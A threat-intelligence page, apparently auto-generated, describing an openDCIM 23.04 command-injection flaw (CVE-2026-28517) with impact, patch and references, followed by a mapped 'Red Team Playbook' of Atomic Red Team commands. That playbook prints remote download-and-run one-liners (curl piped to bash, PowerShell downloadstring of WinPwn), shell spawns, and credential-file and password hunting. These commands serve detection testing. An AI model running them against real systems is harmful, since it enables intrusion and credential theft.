CVE-2026-28517
Overview
This vulnerability is an OS command injection caused by improper handling of user-controlled input in openDCIM version 23.04. The root cause lies in the report_network_map.php component, where the 'dot' configuration parameter is retrieved from the database and passed directly to the exec() function without any validation or sanitization. This allows crafted input to be executed as system commands within the web server's execution context.
Vulnerability Description
openDCIM version 23.04, through commit 4467e9c4, contains an OS command injection vulnerability in report_network_map.php. The application retrieves the 'dot' configuration parameter from the database and passes it directly to exec() without validation or sanitization. If an attacker can modify the fac_Config.dot value, arbitrary commands may be executed in the context of the web server process.
Impact
An unauthenticated attacker capable of altering the fac_Config.dot configuration can execute arbitrary operating system commands with the privileges of the web server process. This enables full system compromise, including data access, service disruption, or lateral movement within the hosting environment. No user interaction is required beyond the ability to modify the configuration parameter, making the attack vector highly critical in environments where configuration controls are insufficiently protected.
Solution
Apply the patch introduced in openDCIM pull request #1664, which sanitizes the 'dot' parameter before execution. Upgrade to a version including commit 8f7ab2a710086a9c8c269560793e47c577ddda09 or later. Refer to the official openDCIM GitHub repository pull request https://github.com/opendcim/openDCIM/pull/1664 for detailed patch information and integration instructions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in openDCIM version 23.04 is characterized by an OS command injection flaw found in the report_network_map.php file. This issue arises from the application’s practice of retrieving the 'dot' configuration parameter directly from the database and subsequently passing it to the exec() function without any form of validation or sanitization. This lack of input validation creates a critical security gap, allowing an attacker to manipulate the fac_Config.dot value. By doing so, they can execute arbitrary commands within the context of the web server process, leading to potentially severe consequences.
Exploitation of this vulnerability can occur through various attack vectors. An attacker with access to the database can modify the 'dot' configuration parameter to include malicious commands. For instance, if an attacker can inject shell commands into the 'dot' parameter, they can execute system-level commands that could lead to unauthorized access, data exfiltration, or even complete system compromise. This scenario is particularly concerning in environments where the web server operates with elevated privileges, as it could allow for extensive damage and control over the affected system.
The real-world impact of this vulnerability is significant, particularly for organizations relying on openDCIM for data center management. The potential for arbitrary command execution poses a substantial business risk, including data breaches, service disruptions, and reputational damage. Attackers could exploit this vulnerability to gain unauthorized access to sensitive information, manipulate critical infrastructure, or deploy malware within the network. The financial implications of such incidents can be severe, encompassing costs associated with incident response, regulatory fines, and loss of customer trust.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments and code reviews are essential to identify and remediate such vulnerabilities before they can be exploited. Employing web application firewalls (WAFs) can help filter out malicious requests and provide an additional layer of defense against injection attacks. Furthermore, organizations should ensure that their database configurations are secure and that access controls are strictly enforced, limiting the ability of unauthorized users to modify critical parameters. Additionally, adopting secure coding practices, such as input validation and parameterized queries, can significantly reduce the risk of similar vulnerabilities in the future.
In conclusion, the OS command injection vulnerability in openDCIM presents a serious threat to organizations utilizing this software. The potential for exploitation highlights the importance of robust security measures and proactive risk management strategies. By understanding the technical details of the vulnerability, recognizing possible attack vectors, and implementing effective detection and mitigation strategies, organizations can safeguard their systems against this and similar threats, ultimately protecting their data and maintaining operational integrity.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the openDCIM OS command injection vulnerability (CVE-2026-28517). Our telemetry indicates a recent surge in activity consistent with adversaries leveraging a publicly available Metasploit module that chains a SQL injection in install.php to overwrite the Graphviz dot binary path, enabling remote code execution via report_network_map.php. This development significantly lowers the technical barrier for attackers, facilitating automated and widespread exploitation campaigns. Although the EPSS score remains stable, the increased detection frequency signals growing adversary interest and operationalization of this vulnerability in the wild. For defenders, this shift underscores an elevated risk posture as exploitation moves beyond theoretical proof-of-concept to active targeting, increasing the likelihood of compromise in environments running vulnerable openDCIM versions. Consequently, the threat level should be considered heightened, reflecting the transition from low-volume testing to broader, more persistent exploitation efforts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Opendcim | Opendcim | 23.04 |
cpe:2.3:a:opendcim:opendcim:23.04:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
openDCIM install.php SQL Injection to RCE
exploits/linux/http/opendcim_install_sqli_rce
|
- | Unknown | - | View |
Threat Feed
9 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (8)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-28517 |
| chocapikk.com |
GitHub CVE
technical-description
exploit
|
https://chocapikk.com/posts/2026/opendcim-sqli-to-rce/ |
| github.com |
GitHub CVE
exploit
|
https://github.com/Chocapikk/opendcim-exploit |
| github.com |
GitHub CVE
issue-tracking
|
https://github.com/opendcim/openDCIM/pull/1664 |
| github.com |
GitHub CVE
patch
|
https://github.com/opendcim/openDCIM/pull/1664/changes/8f7ab2a710086a9c8c269560793e47c577ddda09 |
| github.com |
GitHub CVE
|
https://github.com/opendcim/openDCIM/blob/4467e9c4/report_network_map.php#L7 |
| github.com |
GitHub CVE
|
https://github.com/opendcim/openDCIM/blob/4467e9c4/report_network_map.php#L467 |
| vulncheck.com |
GitHub CVE
third-party-advisory
|
https://www.vulncheck.com/advisories/opendcim-os-command-injection-via-dot-configuration-parameter |